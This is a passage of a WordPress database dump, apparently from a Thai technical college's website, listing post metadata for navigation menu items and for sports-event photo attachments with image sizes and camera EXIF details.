(539, 231, '_menu_item_type', 'custom'),
(540, 231, '_menu_item_menu_item_parent', '227'),
(541, 231, '_menu_item_object_id', '231'),
(542, 231, '_menu_item_object', 'custom'),
(543, 231, '_menu_item_target', ''),
(544, 231, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(545, 231, '_menu_item_xfn', ''),
(546, 231, '_menu_item_url', '/โครงสร้างฝ่ายพัฒนากิจก-2'),
(548, 232, '_menu_item_type', 'custom'),
(549, 232, '_menu_item_menu_item_parent', '38'),
(550, 232, '_menu_item_object_id', '232'),
(551, 232, '_menu_item_object', 'custom'),
(552, 232, '_menu_item_target', ''),
(553, 232, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(554, 232, '_menu_item_xfn', ''),
(555, 232, '_menu_item_url', '/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3/'),
(557, 233, '_menu_item_type', 'custom'),
(558, 233, '_menu_item_menu_item_parent', '38'),
(559, 233, '_menu_item_object_id', '233'),
(560, 233, '_menu_item_object', 'custom'),
(561, 233, '_menu_item_target', ''),
(562, 233, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(563, 233, '_menu_item_xfn', ''),
(564, 233, '_menu_item_url', '#'),
(575, 235, '_menu_item_type', 'custom'),
(576, 235, '_menu_item_menu_item_parent', '38'),
(577, 235, '_menu_item_object_id', '235'),
(578, 235, '_menu_item_object', 'custom'),
(579, 235, '_menu_item_target', ''),
(580, 235, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(581, 235, '_menu_item_xfn', ''),
(582, 235, '_menu_item_url', '#'),
(584, 236, '_menu_item_type', 'custom'),
(585, 236, '_menu_item_menu_item_parent', '38'),
(586, 236, '_menu_item_object_id', '236'),
(587, 236, '_menu_item_object', 'custom'),
(588, 236, '_menu_item_target', ''),
(589, 236, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(590, 236, '_menu_item_xfn', ''),
(591, 236, '_menu_item_url', '#'),
(593, 237, '_menu_item_type', 'custom'),
(594, 237, '_menu_item_menu_item_parent', '38'),
(595, 237, '_menu_item_object_id', '237'),
(596, 237, '_menu_item_object', 'custom'),
(597, 237, '_menu_item_target', ''),
(598, 237, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(599, 237, '_menu_item_xfn', ''),
(600, 237, '_menu_item_url', '#'),
(602, 238, '_menu_item_type', 'custom'),
(603, 238, '_menu_item_menu_item_parent', '810'),
(604, 238, '_menu_item_object_id', '238'),
(605, 238, '_menu_item_object', 'custom'),
(606, 238, '_menu_item_target', ''),
(607, 238, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(608, 238, '_menu_item_xfn', ''),
(609, 238, '_menu_item_url', '/%E0%B8%84%E0%B8%93%E0%B8%B0%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%AB%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%B2%E0%B8%A5%E0%B8%B1%E0%B8%A2%E0%B8%AF/'),
(640, 2, '_edit_lock', '1519364797:3'),
(670, 260, '_wp_attached_file', '2018/01/Screenshot-65.png'),
(671, 260, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1363;s:6:\"height\";i:657;s:4:\"file\";s:25:\"2018/01/Screenshot-65.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-65-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Screenshot-65-300x145.png\";s:5:\"width\";i:300;s:6:\"height\";i:145;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Screenshot-65-768x370.png\";s:5:\"width\";i:768;s:6:\"height\";i:370;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Screenshot-65-1024x494.png\";s:5:\"width\";i:1024;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"Screenshot-65-400x193.png\";s:5:\"width\";i:400;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(752, 287, '_edit_last', '1'),
(753, 287, '_edit_lock', '1524648652:3'),
(763, 287, '_cg_img_link', 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf'),
(764, 287, '_cg_link_target', ''),
(783, 300, '_wp_attached_file', '2018/01/rtc-sport-2560-11.jpg'),
(784, 300, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-11.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-11-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-11-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514138471\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"85\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(785, 301, '_wp_attached_file', '2018/01/rtc-sport-2560-03.jpg'),
(786, 301, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-03.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-03-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-03-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514120368\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"69\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(787, 302, '_wp_attached_file', '2018/01/rtc-sport-2560-02.jpg'),
(788, 302, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-02-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-02-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514119367\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"69\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(789, 303, '_wp_attached_file', '2018/01/rtc-sport-2560-01.jpg'),
(790, 303, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-01.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-01-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-01-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514118288\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"85\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(791, 304, '_wp_attached_file', '2018/01/rtc-sport-2560-05.jpg'),
(792, 304, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-05.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-05-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-05-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514117307\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"75\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(793, 305, '_wp_attached_file', '2018/01/rtc-sport-2560-04.jpg'),
(794, 305, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-04.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-04-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-04-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514116727\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(795, 306, '_wp_attached_file', '2018/01/rtc-sport-2560-14.jpg'),
(796, 306, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-14.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-14-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-14-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514111669\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"28\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(797, 307, '_wp_attached_file', '2018/01/rtc-sport-2560-06.jpg'),
(798, 307, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-06.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-06-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-06-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514109993\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"37\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(799, 308, '_wp_attached_file', '2018/01/rtc-sport-2560-18.jpg'),
(800, 308, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-18.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-18-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-18-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514109617\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"87\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(801, 309, '_wp_attached_file', '2018/01/rtc-sport-2560-19.jpg'),
(802, 309, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-19.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-19-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-19-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"20\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514104546\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:4:\"2500\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(803, 310, '_wp_attached_file', '2018/01/rtc-sport-2560-17.jpg'),
(804, 310, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-17.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-17-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-17-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514104433\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"22\";s:3:\"iso\";s:4:\"2500\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(805, 311, '_wp_attached_file', '2018/01/rtc-sport-2560-20.jpg'),
(806, 311, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-20.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-20-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-20-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514104224\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"29\";s:3:\"iso\";s:4:\"2500\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(807, 312, '_wp_attached_file', '2018/01/rtc-sport-2560-16.jpg'),
(808, 312, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-16.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-16-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-16-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"13\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514103722\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:4:\"2500\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(809, 313, '_wp_attached_file', '2018/01/rtc-sport-2560-15.jpg'),
(810, 313, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-15.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-15-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-15-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"14\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1514103621\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"32\";s:3:\"iso\";s:4:\"2500\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(811, 314, '_wp_attached_file', '2018/01/rtc-sport-2560-10.jpg'),
(812, 314, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-10.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-10-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-10-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1513963768\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"75\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:5:\"0.125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(813, 315, '_wp_attached_file', '2018/01/rtc-sport-2560-13.jpg'),
(814, 315, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-13.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-13-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-13-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1513963016\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(815, 316, '_wp_attached_file', '2018/01/rtc-sport-2560-08.jpg'),
